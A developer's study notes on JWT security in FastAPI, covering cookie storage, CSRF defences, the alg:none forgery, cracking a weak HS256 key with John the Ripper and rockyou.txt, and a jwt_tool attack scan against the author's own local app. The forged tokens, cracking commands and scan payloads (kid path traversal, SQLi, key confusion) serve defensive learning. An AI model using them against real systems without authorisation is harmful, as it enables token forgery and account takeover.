
JWT Security

In Authentication JWT (RS256/EdDSA) I got JWTs working; here I want to look at security, including from the attacker's side, to learn how handling JWTs becomes dangerous.


Where to keep the JWT

Once the server has issued a JWT, where should the client keep it? There seems to be a lot of debate about this.
Keeping it in a cookie is usually considered the more secure option: with HttpOnly set, the token cannot be read by JavaScript running on the page, so an XSS cannot simply lift it out of localStorage, and the protections on the cookie are configured on the backend, which also gives a clean split of responsibility from the frontend.

Info

Defending APIs (Colin Domoney, 2024) says:

The current recommendation for secure token storage is to use the HttpOnly tag on the cookie location to prevent theft.
— p.217

so the recommendation is to keep it in a cookie with HttpOnly set (together with Secure, and a SameSite attribute; see the Defense In Depth section below).

In FastAPI, set_cookie on the response does this.
One downside: once the JWT lives in a cookie, the Authorize button in Swagger UI no longer works... I'll take that inconvenience as the price of being more secure.

If the token lives in a cookie, CSRF protection is mandatory: the browser attaches the cookie to cross-site requests automatically, so a malicious page can make authenticated requests without ever reading the token.

Note

For what CSRF is in the first place, see IPA's 安全なWebサイトの作り方 改訂第7版 (How to Build a Secure Website, 7th revised edition).

In FastAPI, Starlette CSRF Middleware can be used as the CSRF protection middleware.

  • Install

    uv add starlette-csrf
    

  • Code example

    # main.py
    from fastapi import FastAPI
    from starlette_csrf.middleware import CSRFMiddleware
    
    app = FastAPI()
    
    app.add_middleware(
        CSRFMiddleware,
        secret="my_secret",        # example value only; load a long random secret from the environment
        cookie_samesite="strict",
        cookie_httponly=False,     # the frontend JavaScript must be able to read the csrftoken cookie
        cookie_secure=True,
    )
    
    @app.get("/")
    async def read_root():
        return {"Hello": "World"}
    

Send a request with this middleware enabled and the browser receives a csrftoken cookie.
The attributes passed to add_middleware are reflected as-is on the cookie.

(Screenshot) The csrftoken cookie being set once Starlette CSRF Middleware is enabled

OWASP Cross-Site Request Forgery Prevention Cheat Sheet

The OWASP Cross-Site Request Forgery Prevention Cheat Sheet is a very useful baseline for CSRF countermeasures.

Introduction

  • While Cross-Site Scripting (XSS) vulnerabilities can bypass CSRF protections, CSRF tokens are still essential for web applications that rely on cookies for authentication.
  • First, check if your framework has built-in CSRF protection and use it
  • If an API-driven site can't use <form> tags, consider using custom request headers
  • Implement at least one mitigation from Defense in Depth Mitigations section

    Note

    • Even though an XSS vulnerability lets an attacker bypass CSRF protections, CSRF tokens are still essential for web apps that authenticate with cookies
    • First check whether the framework you use has built-in CSRF protection
    • For an API-driven site that cannot use <form> tags, consider custom request headers
    • Apply at least one mitigation from the Defense in Depth Mitigations section

Token-Based Mitigation

  • The synchronizer token pattern is one of the most popular and recommended methods to mitigate CSRF.

    Note

    Having the server hold the token and compare it on each request is one of the most popular and recommended CSRF mitigations.

Synchronizer Token Pattern

  • CSRF tokens should be generated on the server-side and they should be generated only once per user session or each request.
  • CSRF tokens should be: Unique per user session, Secret, Unpredictable
  • CSRF tokens prevent CSRF because without a CSRF token, an attacker cannot create valid requests to the backend server.
  • Since requests with custom headers are automatically subject to the same-origin policy, it is more secure to insert the CSRF token in a custom HTTP request header via JavaScript than adding a CSRF token in the hidden field form parameter.

    Note

    • Tokens are generated server-side, once per session or once per request
    • CSRF tokens must be unique per user session, treated as secret, and unpredictable
    • Without a CSRF token, an attacker cannot build a valid request to the server
    • Requests with custom headers are subject to the same-origin policy, so passing the token in a custom header is more secure than in a hidden form field

Starlette CSRF Middleware uses this Double Submit Cookie pattern: it compares the csrftoken cookie against the x-csrftoken header.

  • If maintaining the state for CSRF token on the server is problematic, you can use an alternative technique known as the Double Submit Cookie pattern. This technique is easy to implement and is stateless.
  • The most secure implementation of the Double Submit Cookie pattern is the Signed Double-Submit Cookie, which explicitly ties tokens to the user's authenticated session (e.g., session ID).
  • To generate HMAC CSRF tokens (with a session-dependent user value), the system must have:
    • A session-dependent value that changes with each login session.
    • A secret cryptographic key
    • A random value for anti-collision purposes
  • It's a common misconception to include timestamps as a value to specify the CSRF token expiration time. A CSRF Token is not an access token. They are used to verify the authenticity of requests throughout a session, using session information. A new session should generate a new token.

    Note

    • If keeping CSRF token state on the server is a problem, the Double Submit Cookie pattern (easy to implement, stateless) is an alternative
    • The most secure variant is the Signed Double-Submit Cookie, which explicitly ties the token to the user's authenticated session; Starlette CSRF Middleware does not seem to offer this
    • Generating an HMAC CSRF token needs a session-dependent value, a secret cryptographic key, and a random anti-collision value
    • Putting a timestamp in the CSRF token to give it an expiry is a common misconception; a CSRF token is not an access token, so it is enough to issue a new token when the session changes
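As an added example (mine, not code from starlette-csrf, OWASP, or this page), here is the Signed Double-Submit Cookie described above implemented with the Python standard library, next to the unsigned double-submit check so the difference shows. The session-dependent value is a hypothetical session_id string; with the JWT-in-cookie setup on this page you could use something like the token's jti or sub claim (my assumption, not something the page specifies). CSRF_SECRET is a placeholder.

```python
import hashlib
import hmac
import secrets

# Placeholder secret for the example; in a real deployment load it from the
# environment or a secrets manager, never hard-code it.
CSRF_SECRET = b"example-only-csrf-secret-change-me"


def _message(session_id: str, random_value: str) -> bytes:
    # Length-prefix the session id so "a!b"+"c" and "a"+"b!c" cannot collide.
    return f"{len(session_id)}!{session_id}!{random_value}".encode()


def generate_csrf_token(session_id: str, secret: bytes = CSRF_SECRET) -> str:
    """Signed Double-Submit Cookie (OWASP): HMAC(secret, session_id + random) + "." + random.

    Stateless: the server stores nothing, yet the token is bound to this login session.
    session_id is whatever identifies the session (hypothetically the JWT's jti or sub).
    """
    random_value = secrets.token_urlsafe(32)  # anti-collision random value
    mac = hmac.new(secret, _message(session_id, random_value), hashlib.sha256).hexdigest()
    return f"{mac}.{random_value}"


def verify_csrf_token(cookie_token: str, header_token: str, session_id: str,
                      secret: bytes = CSRF_SECRET) -> bool:
    """Run on every state-changing request (POST/PUT/PATCH/DELETE).

    Cookie must equal header (double submit) AND the HMAC must be valid for *this*
    session, so a token minted for another session is rejected. Constant-time compares.
    """
    if not cookie_token or not header_token:
        return False
    if not hmac.compare_digest(cookie_token, header_token):
        return False
    mac, sep, random_value = cookie_token.partition(".")
    if not sep or not random_value:
        return False
    expected = hmac.new(secret, _message(session_id, random_value), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)


def naive_double_submit_ok(cookie_token: str, header_token: str) -> bool:
    """Unsigned double submit: only checks cookie == header. Any value the attacker can
    plant as a cookie in the victim's browser (e.g. from a sibling subdomain) passes."""
    return bool(cookie_token) and hmac.compare_digest(cookie_token, header_token)


def demo() -> dict:
    victim_session = "sess-victim-42"
    token = generate_csrf_token(victim_session)
    # Attacker obtains a token for their *own* session and plants it as the victim's cookie.
    planted = generate_csrf_token("sess-attacker-7")
    return {
        "legit_request": verify_csrf_token(token, token, victim_session),
        "missing_header": verify_csrf_token(token, "", victim_session),
        "token_from_other_session": verify_csrf_token(token, token, "sess-attacker-7"),
        "planted_cookie_signed_check": verify_csrf_token(planted, planted, victim_session),
        "planted_cookie_naive_check": naive_double_submit_ok(planted, planted),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The server sets the returned token as the csrftoken cookie without HttpOnly (the frontend has to read it and echo it in x-csrftoken, as with the middleware configuration above), while the JWT cookie itself stays HttpOnly. The naive check accepts a cookie the attacker planted; the signed check rejects it because the HMAC was computed over a different session.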

Employing Custom Request Headers for AJAX/API

Starlette CSRF Middleware assumes this approach: the frontend sends the CSRF token in the x-csrftoken header.

  • A user-friendly defense that is particularly well suited for AJAX or API endpoints is the use of a custom request header.

    Note

    Using a custom request header is a defence particularly well suited to AJAX and API endpoints.

Defense In Depth Techniques

  • This attribute helps the browser decide whether to send cookies along with cross-site requests.
  • The Strict value will prevent the cookie from being sent by the browser to the target site in all cross-site browsing context, even when following a regular link.
  • If a website wants to maintain a user's logged-in session after the user arrives from an external link, SameSite's default Lax value provides a reasonable balance between security and usability.
  • This attribute should not replace a CSRF Token. Instead, it should co-exist with that token to protect the user in a more robust way.

    Note

    • The SameSite attribute tells the browser whether to send the cookie with cross-site requests
    • Strict stops the browser sending the cookie in every cross-site context, including when the user follows an ordinary link
    • If you want to keep the user logged in when they arrive from an external link, the default Lax is a reasonable balance of security and usability
    • This attribute is no replacement for a CSRF token; used together they protect the user more robustly

"alg: none" attack

When verifying (decoding) a JWT, using the alg written in the JWT's own header to drive the verification is a bad idea.
From the attacker's point of view, if a JWT with alg: none (no signature) can be made to pass verification, they can put something like admin: true in the payload and gain administrator rights. Case variants such as None, NONE and nOnE are tried as well (jwt_tool does exactly this in the scan further down), so a verifier must not merely blacklist the lowercase spelling.

Note

If you use PyJWT this attack is basically not possible (even the bad code below raises an exception when run).

An alg: none JWT can be built by anyone at https://www.jwt.io/.

# ⚠️ Bad example that leaves room for the attack: it reads `alg` from the JWT header and uses it for verification.
import jwt  # PyJWT

jwt_token = "eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiJhbGljZSIsImV4cCI6OTk5OTk5OTk5OSwiYWRtaW4iOnRydWV9."

header = jwt.get_unverified_header(jwt_token)  # read alg from the (unverified) header
algorithm = header["alg"]                       # "none" ends up here
payload = jwt.decode(jwt_token, algorithms=[algorithm])  # algorithms expects a list; this one is attacker-controlled

print("payload:", payload)

Run it and PyJWT protects you: it raises an exception.

jwt.exceptions.InvalidSignatureError: Signature verification failed

The fix is to not take alg from the header at all: the verifier specifies the algorithm (and key) it accepts when decoding. For the RS256/EdDSA setup from the earlier page, pass the public key and algorithms=["RS256"] or ["EdDSA"] in the same way.

payload = jwt.decode(jwt_token, "my_secret", algorithms=["HS256"])  # the verifier pins the algorithm


Offline dictionary attack on HS256

With a shared-key scheme like HS256, the key can be attacked offline with a dictionary using hashcat or John the Ripper.

Warning

You might think that with HTTPS the JWT cannot be stolen, but an attacker can simply create their own user account, take the JWT they are legitimately issued, and attack it offline; if they recover the key they can forge as many JWTs as they like.

As an example, use a JWT deliberately signed with a poor key (my_secret).

import jwt  # PyJWT
from datetime import datetime, timedelta, timezone

expire = datetime.now(timezone.utc) + timedelta(minutes=10)
to_encode = {"exp": expire, "sub": "alice"}
jwt_token = jwt.encode(to_encode, "my_secret", algorithm="HS256")

print(jwt_token)
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3NzIwNjQ5NzgsInN1YiI6ImFsaWNlIn0.t49It3EFK8RL8PJfvjBC1mu51Q6-yIq9s23CrfHMawE

A JWT is not encrypted, so the signing algorithm can be read off at https://www.jwt.io/ or similar. Save this JWT to a text file.

$ cat jwt.txt
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3NzIwNjQ5NzgsInN1YiI6ImFsaWNlIn0.t49It3EFK8RL8PJfvjBC1mu51Q6-yIq9s23CrfHMawE

Install the Jumbo build of John the Ripper and get rockyou.txt (a wordlist of leaked passwords).

$ sudo snap install john-the-ripper
$ john --test
$ wget https://weakpass.com/download/90/rockyou.txt.gz
$ gunzip rockyou.txt.gz

Run the offline dictionary attack and the key falls out instantly.

$ john --format=HMAC-SHA256 --wordlist=rockyou.txt jwt.txt
Using default input encoding: UTF-8
Loaded 1 password hash (HMAC-SHA256 [password is key, SHA256 256/256 AVX2 8x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status
my_secret        (?)
1g 0:00:00:00 DONE (2026-02-23 12:27) 5.263g/s 4484Kp/s 4484Kc/s 4484KC/s natnatmissy..momo5390
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Running john --list=formats shows that it supports a large number of algorithms, including HMAC-SHA256 and others relevant to JWTs.

Output of john --list=formats
$ john --list=formats
descrypt, bsdicrypt, md5crypt, md5crypt-long, bcrypt, scrypt, LM, AFS,
tripcode, AndroidBackup, adxcrypt, agilekeychain, aix-ssha1, aix-ssha256,
aix-ssha512, andOTP, ansible, Argon2, armory, as400-des, as400-ssha1,
asa-md5, AxCrypt, AzureAD, BestCrypt, BestCryptVE4, bfegg, Bitcoin,
BitLocker, bitshares, Bitwarden, BKS, Blackberry-ES10, WoWSRP, Blockchain,
cardano, chap, Clipperz, cloudkeychain, dynamic_n, cq, CRC32, cryptoSafe,
sha1crypt, sha256crypt, sha512crypt, Citrix_NS10, dahua, dashlane,
diskcryptor, Django, django-scrypt, dmd5, dmg, dominosec, dominosec8,
DPAPImk, dragonfly3-32, dragonfly3-64, dragonfly4-32, dragonfly4-64, Drupal7,
eCryptfs, eigrp, electrum, ENCDataVault-MD5, ENCDataVault-PBKDF2, EncFS,
enpass, EPI, EPiServer, ethereum, fde, Fortigate256, Fortigate, FormSpring,
FVDE, geli, gost, streebog256crypt, streebog512crypt, gost94crypt, gpg,
HAVAL-128-4, HAVAL-256-3, hdaa, hMailServer, hsrp, IKE, ipb2, itunes-backup,
iwork, KeePass, keplr, keychain, keyring, keystore, known_hosts, krb4, krb5,
krb5asrep, krb5pa-sha1, krb5pa-md5, krb5tgs, krb5tgs-sha1, krb5-17, krb5-18,
krb5-3, kwallet, lp, lpcli, leet, lotus5, lotus85, LUKS, MD2, mdc2,
MediaWiki, monero, money, MongoDB, scram, Mozilla, mscash, mscash2, MSCHAPv2,
mschapv2-naive, mssql, mssql05, mssql12, multibit, mysqlna, mysql-sha1,
mysql, net-ah, nethalflm, netlm, netlmv2, net-md5, netntlmv2, netntlm,
netntlm-naive, net-sha1, nk, notes, md5ns, nsec3, NT, NT-long, o10glogon,
o3logon, o5logon, ODF, Office, oldoffice, OpenBSD-SoftRAID, openssl-enc,
oracle, oracle11, Oracle12C, osc, ospf, Padlock, Palshop, Panama,
PBKDF2-HMAC-MD4, PBKDF2-HMAC-MD5, PBKDF2-HMAC-SHA1, PBKDF2-HMAC-SHA256,
PBKDF2-HMAC-SHA512, PDF, PEM, pfx, pgpdisk, pgpsda, pgpwde, phpass, PHPS,
PHPS2, pix-md5, PKZIP, po, postgres, PST, PuTTY, pwsafe, qnx, RACF,
RACF-KDFAES, radius, RAdmin, RAKP, rar, RAR5, Raw-SHA512, Raw-Blake2,
Raw-Keccak, Raw-Keccak-256, Raw-MD4, Raw-MD5, Raw-MD5u, Raw-SHA1,
Raw-SHA1-AxCrypt, Raw-SHA1-Linkedin, Raw-SHA224, Raw-SHA256, Raw-SHA3,
Raw-SHA384, restic, ripemd-128, ripemd-160, rsvp, RVARY, Siemens-S7,
Salted-SHA1, SSHA512, sapb, sapg, saph, sappse, securezip, 7z, Signal, SIP,
skein-256, skein-512, skey, SL3, SM3, Snefru-128, Snefru-256, LastPass, SNMP,
solarwinds, SSH, sspr, Stribog-256, Stribog-512, STRIP, SunMD5, SybaseASE,
Sybase-PROP, tacacs-plus, tcp-md5, telegram, tezos, Tiger, timeroast,
tc_aes_xts, tc_ripemd160, tc_ripemd160boot, tc_sha512, tc_whirlpool, vdi,
OpenVMS, vmx, VNC, vtp, wbb3, whirlpool, whirlpool0, whirlpool1, wpapsk,
wpapsk-pmk, xmpp-scram, xsha, xsha512, zed, ZIP, ZipMonster, plaintext,
has-160, HMAC-MD5, HMAC-SHA1, HMAC-SHA224, HMAC-SHA256, HMAC-SHA384,
HMAC-SHA512, AndroidBackup-opencl, agilekeychain-opencl, ansible-opencl,
argon2-opencl, axcrypt-opencl, axcrypt2-opencl, Bitcoin-opencl,
BitLocker-opencl, bitwarden-opencl, blockchain-opencl, cloudkeychain-opencl,
bcrypt-opencl, descrypt-opencl, gost94crypt-opencl, md5crypt-opencl,
cryptosafe-opencl, sha1crypt-opencl, sha256crypt-opencl, sha512crypt-opencl,
streebog256crypt-opencl, streebog512crypt-opencl, dashlane-opencl,
diskcryptor-opencl, diskcryptor-aes-opencl, dmg-opencl,
electrum-modern-opencl, EncFS-opencl, enpass-opencl, ethereum-opencl,
ethereum-presale-opencl, FVDE-opencl, geli-opencl, gpg-opencl, iwork-opencl,
KeePass-opencl, KeePass-Argon2-opencl, keychain-opencl, keyring-opencl,
keystore-opencl, krb5pa-md5-opencl, krb5pa-sha1-opencl, krb5tgs-opencl,
krb5asrep-aes-opencl, krb5tgs-sha1-opencl, lp-opencl, lpcli-opencl,
LM-opencl, lotus5-opencl, mscash-opencl, mscash2-opencl, mysql-sha1-opencl,
notes-opencl, NT-opencl, ntlmv2-opencl, NT-long-opencl, o5logon-opencl,
ODF-opencl, office-opencl, oldoffice-opencl, OpenBSD-SoftRAID-opencl,
PBKDF2-HMAC-MD4-opencl, PBKDF2-HMAC-MD5-opencl, PBKDF2-HMAC-SHA1-opencl,
PBKDF2-HMAC-SHA256-opencl, PBKDF2-HMAC-SHA512-opencl, pdf-opencl, pem-opencl,
pfx-opencl, pgpdisk-opencl, pgpsda-opencl, pgpwde-opencl, phpass-opencl,
pwsafe-opencl, RAKP-opencl, rar-opencl, RAR5-opencl, raw-MD4-opencl,
raw-MD5-opencl, raw-SHA1-opencl, raw-SHA256-opencl, raw-SHA512-free-opencl,
raw-SHA512-opencl, salted-SHA1-opencl, sappse-opencl, 7z-opencl, SL3-opencl,
solarwinds-opencl, ssh-opencl, sspr-opencl, strip-opencl, telegram-opencl,
tezos-opencl, timeroast-opencl, TrueCrypt-opencl, vmx-opencl, wpapsk-opencl,
wpapsk-pmk-opencl, XSHA512-free-opencl, XSHA512-opencl, zed-opencl,
ZIP-opencl, dummy, crypt
531 formats (151 dynamic formats shown as just "dynamic_n" here)

Info

Because offline dictionary attacks are possible, an HS256 key must be long and unguessable (generate it with something like openssl rand -hex 32; 256 bits of randomness is far beyond any wordlist).
The fundamental fix is to switch to RS256 / EdDSA, signing with a private key and verifying with the public key: the verifying service then holds nothing that could be used to forge tokens.
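The following added example (mine, not the page's code and not PyJWT) shows the previous two sections in plain standard-library Python: a verifier that trusts the alg in the token's header and therefore accepts the alg:none token from above, a verifier that pins HS256 and checks exp, and the dictionary attack from this section run against the page's my_secret token. WORDLIST is a constructed five-entry stand-in for rockyou.txt; the strong key is generated with secrets.token_bytes(32), the equivalent of openssl rand -hex 32.

```python
import base64
import hashlib
import hmac
import json
import secrets
import time
from typing import Iterable, Optional


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _segment(obj: dict) -> str:
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def hs256_sign(payload: dict, key: bytes) -> str:
    """Issue a compact JWS exactly as an HS256 issuer would."""
    signing_input = f"{_segment({'alg': 'HS256', 'typ': 'JWT'})}.{_segment(payload)}"
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url_encode(sig)}"


def forge_alg_none(payload: dict) -> str:
    """What the attacker builds: header says alg=none, signature part left empty."""
    return f"{_segment({'alg': 'none', 'typ': 'JWT'})}.{_segment(payload)}."


def naive_verify(token: str, key: bytes) -> Optional[dict]:
    """BAD: trusts the alg named by the token itself, so 'none' skips the check."""
    head, body, sig = token.split(".")
    alg = json.loads(b64url_decode(head)).get("alg")
    if alg == "none":                       # attacker-controlled branch
        return json.loads(b64url_decode(body))
    if alg == "HS256":
        expected = hmac.new(key, f"{head}.{body}".encode(), hashlib.sha256).digest()
        if hmac.compare_digest(expected, b64url_decode(sig)):
            return json.loads(b64url_decode(body))
    return None


def strict_verify(token: str, key: bytes, now: Optional[float] = None) -> Optional[dict]:
    """GOOD: the verifier decides the algorithm (HS256 only) and also enforces exp."""
    parts = token.split(".")
    if len(parts) != 3 or not parts[2]:
        return None
    head, body, sig = parts
    if json.loads(b64url_decode(head)).get("alg") != "HS256":
        return None
    expected = hmac.new(key, f"{head}.{body}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig)):
        return None
    payload = json.loads(b64url_decode(body))
    if "exp" in payload and payload["exp"] <= (time.time() if now is None else now):
        return None
    return payload


def crack_hs256(token: str, wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack: header.payload is public, so each guess costs one HMAC."""
    head, body, sig = token.split(".")
    signing_input, target = f"{head}.{body}".encode(), b64url_decode(sig)
    for guess in wordlist:
        mac = hmac.new(guess.encode(), signing_input, hashlib.sha256).digest()
        if hmac.compare_digest(mac, target):
            return guess
    return None


WEAK_KEY = b"my_secret"  # the page's deliberately bad key
# Constructed stand-in for rockyou.txt; the real list has millions of entries.
WORDLIST = ["123456", "password", "secret", "my_secret", "letmein"]
# The HS256 token from the page above, signed with "my_secret".
PAGE_TOKEN = ("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
              "eyJleHAiOjE3NzIwNjQ5NzgsInN1YiI6ImFsaWNlIn0."
              "t49It3EFK8RL8PJfvjBC1mu51Q6-yIq9s23CrfHMawE")


def demo() -> dict:
    claims = {"sub": "alice", "exp": 9999999999, "admin": True}
    forged = forge_alg_none(claims)                   # same token as in the alg:none section
    cracked = crack_hs256(PAGE_TOKEN, WORDLIST)
    strong_key = secrets.token_bytes(32)              # what openssl rand -hex 32 gives you
    return {
        "naive_accepts_alg_none": naive_verify(forged, WEAK_KEY) is not None,
        "strict_rejects_alg_none": strict_verify(forged, WEAK_KEY) is None,
        "cracked_key": cracked,
        # With the recovered key the attacker mints an admin token the strict verifier accepts.
        "forged_admin_accepted": strict_verify(hs256_sign(claims, (cracked or "").encode()), WEAK_KEY) == claims,
        "strong_key_cracked": crack_hs256(hs256_sign(claims, strong_key), WORDLIST),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The two failure modes are independent: pinning the algorithm stops the alg:none forgery but does nothing against a guessable HS256 key, and the dictionary attack needs no access to the server at all, only one token the attacker was legitimately issued.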


jwt_tool

jwt_tool is a tool for analysing JWTs and automatically trying a range of attacks against them.

Install

Clone the repository and install the dependencies into a virtual environment.

% git clone https://github.com/ticarpi/jwt_tool.git
% cd jwt_tool
% uv venv
% uv pip install -r requirements.txt
% uv run python jwt_tool.py

The first run creates the config file (jwtconf.ini).

Analysing a JWT

Pass a JWT as the argument and it decodes and displays the header and payload.

% python jwt_tool.py eyJhbGciOiJFZERTQS...(truncated)

Token header values:
[+] alg = "EdDSA"
[+] typ = "JWT"

Token payload values:
[+] exp = 1773727756    ==> TIMESTAMP = 2026-03-17 15:09:16 (UTC)
[+] sub = "71199a58-60e1-46e8-b7c1-a2acb1c03e45"
[+] scope = "login_access"

Security tests

With the FastAPI app running on localhost:8000, the JWT can be tested against it.
/api/v1/users/me requires authentication; with a valid JWT in the cookie it returns the caller's own user record. Scan with -M at (all tests). Against the legitimately EdDSA-signed JWT, every attack (alg:none, signature forgery, key confusion, kid injection, and so on) comes back 403 (rejected).

One caveat visible in the output below: the prescan reports that the original token and the request with no token both return 403, and jwt_tool itself warns that it cannot tell a valid response from an invalid one. Those 403s therefore do not yet prove anything about the verification logic. The baseline request with the valid cookie has to return 200 first (check how the cookie is passed with -rc, or give jwt_tool a logged-in marker from the response body with -cv); only then does a 403 on each attack variant mean the variant was actually rejected.

jwt_tool scan results
% python jwt_tool.py -M at -t http://localhost:8000/api/v1/users/me -rc "access_token=eyJhbGciOiJFZERTQSIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3NzM3Mjc3NTYsInN1YiI6IjcxMTk5YTU4LTYwZTEtNDZlOC1iN2MxLWEyYWNiMWMwM2U0NSIsInNjb3BlIjoibG9naW5fYWNjZXNzIn0.m4mvayCjhYoi8gX9iBK2GSzTZMtv0XKWGdx5RS1Q89TmzEQuqVVs4nNHlqcQCTdaUy2nOaVrhsLFd_0_l-pfAg" -np

        \   \        \         \          \                    \ 
   \__   |   |  \     |\__    __| \__    __|                    |
         |   |   \    |      |          |       \         \     |
         |        \   |      |          |    __  \     __  \    |
  \      |      _     |      |          |   |     |   |     |   |
   |     |     / \    |      |          |   |     |   |     |   |
\        |    /   \   |      |          |\        |\        |   |
 \______/ \__/     \__|   \__|      \__| \______/  \______/ \__|
 Version 2.3.0                \______|             @ticarpi      

/Users/alice/.jwt_tool/jwtconf.ini
Original JWT: eyJhbGciOiJFZERTQSIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3NzM3Mjc3NTYsInN1YiI6IjcxMTk5YTU4LTYwZTEtNDZlOC1iN2MxLWEyYWNiMWMwM2U0NSIsInNjb3BlIjoibG9naW5fYWNjZXNzIn0.m4mvayCjhYoi8gX9iBK2GSzTZMtv0XKWGdx5RS1Q89TmzEQuqVVs4nNHlqcQCTdaUy2nOaVrhsLFd_0_l-pfAg

=====================
Decoded Token Values:
=====================

Token header values:
[+] alg = "EdDSA"
[+] typ = "JWT"

Token payload values:
[+] exp = 1773727756    ==> TIMESTAMP = 2026-03-17 15:09:16 (UTC)
[+] sub = "71199a58-60e1-46e8-b7c1-a2acb1c03e45"
[+] scope = "login_access"

----------------------
JWT common timestamps:
iat = IssuedAt
exp = Expires
nbf = NotBefore
----------------------

[+] Sending token
jwttool_1ceb891ce18665d791c28f1df6bf9a4a Sending token Response Code: 403, 43 bytes
Running Scanning Module:
Running prescan checks...
jwttool_1ceb891ce18665d791c28f1df6bf9a4a Prescan: original token Response Code: 403, 43 bytes
jwttool_4a206a6288377b6a08cd288545606893 Prescan: no token Response Code: 403, 43 bytes
Valid and missing token requests return the same Status Code.
You should probably specify something from the page that identifies the user is logged-in (e.g. -cv "Welcome back, ticarpi!")
Do you wish to continue anyway? ("Y" or "N")y
jwttool_96f504bd89321193b6e785ed4dd84c0f Prescan: Broken signature Response Code: 403, 43 bytes
jwttool_3e9e8bf63c88bbc38d3a3892beb1891c Prescan: repeat original token Response Code: 403, 43 bytes

LAUNCHING SCAN: JWT Attack Playbook
jwttool_96f504bd89321193b6e785ed4dd84c0f Broken signature Response Code: 403, 43 bytes
jwttool_3e9e8bf63c88bbc38d3a3892beb1891c Persistence check 1 (should always be valid) Response Code: 403, 43 bytes
jwttool_be93fdc2a7d594417aa7f758093dde7d Claim processing check in exp claim Response Code: 403, 43 bytes
jwttool_3588aa0d549e35ba5d0b5a25edb4a12e Claim processing check in sub claim Response Code: 403, 43 bytes
jwttool_248d295c48e885c1dba233dc29a0ffdb Claim processing check in scope claim Response Code: 403, 43 bytes
jwttool_3e9e8bf63c88bbc38d3a3892beb1891c Persistence check 2 (should always be valid) Response Code: 403, 43 bytes
jwttool_1be5fdc7a6a9470be0697fa77b5ff5d2 Exploit: Blank password accepted in signature (-X b) Response Code: 403, 43 bytes
jwttool_80a5d15bb850ad5772e7f9889b8895ca Exploit: 'Psychic Signature' accepted in ECDSA signing (-X p) Response Code: 403, 43 bytes
jwttool_c204f8dbfe9d452c5f718e9a3a0e737d Exploit: Null signature (-X n) Response Code: 403, 43 bytes
jwttool_a7276b7da8f7d0c53580afa0ae8de840 Exploit: "alg":"none" (-X a) Response Code: 403, 43 bytes
jwttool_606e54d003531aec91b54cdb63c8acfe Exploit: "alg":"None" (-X a) Response Code: 403, 43 bytes
jwttool_5fc221a2d16909c0745cb9d1bfb8ca90 Exploit: "alg":"NONE" (-X a) Response Code: 403, 43 bytes
jwttool_bb4a8f97634e1568300e34656250cfad Exploit: "alg":"nOnE" (-X a) Response Code: 403, 43 bytes
File loaded: /Users/alice/.jwt_tool/jwttool_custom_public_RSA.pem
jwttool_72e8b0b4cd0027c8eeab50d664d8e088 Exploit: RSA Key Confusion Exploit (provided Public Key) Response Code: 403, 43 bytes
key: /Users/alice/.jwt_tool/jwttool_custom_private_RSA.pem
jwttool_05dade575c3d4e276a48f9e641bb286a Exploit: Injected JWKS (-X i) Response Code: 403, 43 bytes
jwttool_c0ac3d0c7e7ecb9797b7f46c3a0cce5c Exploit: Spoof JWKS (-X s) Response Code: 403, 43 bytes
jwttool_1ee7a3ff9eac6878389134e4e017bd4d Injected kid claim - null-signed with blank kid Response Code: 403, 43 bytes
jwttool_aecd76251e4f67f2a88d4b755802134a Injected kid claim - null-signed with kid="[path traversal]/dev/null" Response Code: 403, 43 bytes
jwttool_d2c1759684c82c3874fdefe86a41e946 Injected kid claim - null-signed with kid="/dev/null" Response Code: 403, 43 bytes
jwttool_8eccdf1b77f581bd5eaaf017684f8337 Injected kid claim - null-signed with kid="/invalid_path" Response Code: 403, 43 bytes
jwttool_9866c2b1c0c34242f2e464fc007324d7 Injected kid claim - RCE attempt - SLEEP 10 (did this request pause?) Response Code: 403, 43 bytes
jwttool_6397584c87455d3d73a9d43d2e06ae9b Injected kid claim - signed with secret = '1' from SQLi Response Code: 403, 43 bytes
External service interactions not tested - enter listener URL into 'jwtconf.ini' to try this option
Scanning mode completed: review the above results.

The following additional checks should be performed that are better tested manually:
[+] Try hunting for a Public Key for this token. Validate any JWKS you find (-V -jw [jwks_file]) and then use the generated Public Key file with the Playbook Scan (-pk [kid_from_jwks].pem)
Common locations for Public Keys are either the web application's SSL key, or stored as a JWKS file in one of these locations:
/oauth2/v1/keys
/jwks.json
/.well-known/jwks.json
/.well-known/jwks_uri
/.well-known/openid-configuration/jwks
/openid/connect/jwks.json
[+] Try waiting for the token to expire ("exp" value set to: 2026-03-17 15:09:16 (UTC))
Check if still working once expired.

LAUNCHING SCAN: Forced Errors
jwttool_c8722c029a00c6576b5b519b32e8c9f4 Injected None into Header Claim: alg Response Code: 403, 43 bytes
jwttool_412435dc5788bcdb52da9c20c48ec053 Injected None into Header Claim: typ Response Code: 403, 43 bytes
jwttool_1c3f145050952c2727980655e47ec229 Injected True into Header Claim: alg Response Code: 403, 43 bytes
jwttool_56b7bacab86ff37ece3b485c410875eb Injected True into Header Claim: typ Response Code: 403, 43 bytes
jwttool_09d72935b7c4917c74e95f8fd7684775 Injected False into Header Claim: alg Response Code: 403, 43 bytes
jwttool_912e9d8d534ade0ac3313c7c0455992a Injected False into Header Claim: typ Response Code: 403, 43 bytes
